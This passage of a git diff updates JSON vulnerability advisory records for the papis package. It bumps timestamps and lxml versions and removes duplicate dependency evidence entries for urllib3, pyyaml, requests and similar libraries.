b/advisories/BREW-papis-CVE-2018-19787.json index 95fd9223d62..0f298c11b49 100644 --- a/advisories/BREW-papis-CVE-2018-19787.json +++ b/advisories/BREW-papis-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2018-19787", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.2.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2018-20060.json b/advisories/BREW-papis-CVE-2018-20060.json index 30e7f47b2a2..f51b1538db0 100644 --- a/advisories/BREW-papis-CVE-2018-20060.json +++ b/advisories/BREW-papis-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2018-20060", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2018-25091.json b/advisories/BREW-papis-CVE-2018-25091.json index 8d916d215a9..1ca5891f63c 100644 --- a/advisories/BREW-papis-CVE-2018-25091.json +++ b/advisories/BREW-papis-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2018-25091", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2019-11236.json b/advisories/BREW-papis-CVE-2019-11236.json index 194c6498fc0..6e5981f6b73 100644 --- a/advisories/BREW-papis-CVE-2019-11236.json +++ b/advisories/BREW-papis-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2019-11236", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2019-11324.json b/advisories/BREW-papis-CVE-2019-11324.json index 9b84c3e9749..a695e467b1c 100644 --- a/advisories/BREW-papis-CVE-2019-11324.json +++ b/advisories/BREW-papis-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2019-11324", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2019-20477.json b/advisories/BREW-papis-CVE-2019-20477.json index c69c48e4ca5..8e4690d679d 100644 --- a/advisories/BREW-papis-CVE-2019-20477.json +++ b/advisories/BREW-papis-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2019-20477", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2020-14343.json b/advisories/BREW-papis-CVE-2020-14343.json index bfe06f89538..6dfd0d214e4 100644 --- a/advisories/BREW-papis-CVE-2020-14343.json +++ b/advisories/BREW-papis-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-14343", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2020-1747.json b/advisories/BREW-papis-CVE-2020-1747.json index b83a9b39801..fcd282fcfcc 100644 --- a/advisories/BREW-papis-CVE-2020-1747.json +++ b/advisories/BREW-papis-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-1747", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2020-26137.json b/advisories/BREW-papis-CVE-2020-26137.json index 21e6dda5c4d..c73e08dae8d 100644 --- a/advisories/BREW-papis-CVE-2020-26137.json +++ b/advisories/BREW-papis-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-26137", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2020-27783.json b/advisories/BREW-papis-CVE-2020-27783.json index 5c543ed2940..9458b1d652e 100644 --- a/advisories/BREW-papis-CVE-2020-27783.json +++ b/advisories/BREW-papis-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-27783", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.2", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2020-7212.json b/advisories/BREW-papis-CVE-2020-7212.json index 0ac47360e83..7290a4f64cc 100644 --- a/advisories/BREW-papis-CVE-2020-7212.json +++ b/advisories/BREW-papis-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-7212", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-20270.json b/advisories/BREW-papis-CVE-2021-20270.json index a619123f248..71255b2b085 100644 --- a/advisories/BREW-papis-CVE-2021-20270.json +++ b/advisories/BREW-papis-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-20270", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-27291.json b/advisories/BREW-papis-CVE-2021-27291.json index 7e7c05c5f46..aa79bef2340 100644 --- a/advisories/BREW-papis-CVE-2021-27291.json +++ b/advisories/BREW-papis-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-27291", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-28363.json b/advisories/BREW-papis-CVE-2021-28363.json index 0a9e88fdb2b..f44a3ddd038 100644 --- a/advisories/BREW-papis-CVE-2021-28363.json +++ b/advisories/BREW-papis-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-28363", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-28957.json b/advisories/BREW-papis-CVE-2021-28957.json index 5ab5fa2dfd7..390d451ace9 100644 --- a/advisories/BREW-papis-CVE-2021-28957.json +++ b/advisories/BREW-papis-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-28957", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.3", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2021-33503.json b/advisories/BREW-papis-CVE-2021-33503.json index 790f6051f4d..9dbe1058bfb 100644 --- a/advisories/BREW-papis-CVE-2021-33503.json +++ b/advisories/BREW-papis-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-33503", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-43818.json b/advisories/BREW-papis-CVE-2021-43818.json index 7c3267df0a6..fc73da4d776 100644 --- a/advisories/BREW-papis-CVE-2021-43818.json +++ b/advisories/BREW-papis-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-43818", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2022-2309.json b/advisories/BREW-papis-CVE-2022-2309.json index 59fce31135d..b3c2dc2747a 100644 --- a/advisories/BREW-papis-CVE-2022-2309.json +++ b/advisories/BREW-papis-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2022-2309", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.9.1", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2022-40896.json b/advisories/BREW-papis-CVE-2022-40896.json index cd3e6d82b4d..4b63fcb12c2 100644 --- a/advisories/BREW-papis-CVE-2022-40896.json +++ b/advisories/BREW-papis-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2022-40896", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2023-32681.json b/advisories/BREW-papis-CVE-2023-32681.json index ce96427ac80..d4ed81c4795 100644 --- a/advisories/BREW-papis-CVE-2023-32681.json +++ b/advisories/BREW-papis-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2023-32681", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2023-43804.json b/advisories/BREW-papis-CVE-2023-43804.json index 26aa32cb1cd..a424ffaa0e4 100644 --- a/advisories/BREW-papis-CVE-2023-43804.json +++ b/advisories/BREW-papis-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2023-43804", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2023-45803.json b/advisories/BREW-papis-CVE-2023-45803.json index 4279c4f30b4..33c93b7bcf5 100644 --- a/advisories/BREW-papis-CVE-2023-45803.json +++ b/advisories/BREW-papis-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2023-45803", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-34062.json b/advisories/BREW-papis-CVE-2024-34062.json index 3ff46b8dcfe..923ec1dad5a 100644 --- a/advisories/BREW-papis-CVE-2024-34062.json +++ b/advisories/BREW-papis-CVE-2024-34062.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-34062", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-g7vv-2v7x-gj9p", "CVE-2024-34062", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-35195.json b/advisories/BREW-papis-CVE-2024-35195.json index 3eb9ebd2751..dc5cf04c13f 100644 --- a/advisories/BREW-papis-CVE-2024-35195.json +++ b/advisories/BREW-papis-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-35195", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-3651.json b/advisories/BREW-papis-CVE-2024-3651.json index ab5114b228f..91845aa845d 100644 --- a/advisories/BREW-papis-CVE-2024-3651.json +++ b/advisories/BREW-papis-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-3651", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-37891.json b/advisories/BREW-papis-CVE-2024-37891.json index 6dbd47100ec..c3b1db2cab3 100644 --- a/advisories/BREW-papis-CVE-2024-37891.json +++ b/advisories/BREW-papis-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-37891", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-47081.json b/advisories/BREW-papis-CVE-2024-47081.json index 1a105fa4ade..c997ba5d6c6 100644 --- a/advisories/BREW-papis-CVE-2024-47081.json +++ b/advisories/BREW-papis-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-47081", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-43859.json b/advisories/BREW-papis-CVE-2025-43859.json index d39123ffef5..6029fbc5a60 100644 --- a/advisories/BREW-papis-CVE-2025-43859.json +++ b/advisories/BREW-papis-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-43859", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:19:42Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-50181.json b/advisories/BREW-papis-CVE-2025-50181.json index f6f38ccc2e3..077c15d96b6 100644 --- a/advisories/BREW-papis-CVE-2025-50181.json +++ b/advisories/BREW-papis-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-50181", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-50182.json b/advisories/BREW-papis-CVE-2025-50182.json index fec488aff4e..bcb1966d494 100644 --- a/advisories/BREW-papis-CVE-2025-50182.json +++ b/advisories/BREW-papis-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-50182", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-66418.json b/advisories/BREW-papis-CVE-2025-66418.json index 9f2078d86ee..473892558ea 100644 --- a/advisories/BREW-papis-CVE-2025-66418.json +++ b/advisories/BREW-papis-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-66418", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-66471.json b/advisories/BREW-papis-CVE-2025-66471.json index 39bd33535e8..b5b7b5cedfb 100644 --- a/advisories/BREW-papis-CVE-2025-66471.json +++ b/advisories/BREW-papis-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-66471", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-21441.json b/advisories/BREW-papis-CVE-2026-21441.json index c06ef4a2a42..9e54d888f76 100644 --- a/advisories/BREW-papis-CVE-2026-21441.json +++ b/advisories/BREW-papis-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-21441", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": 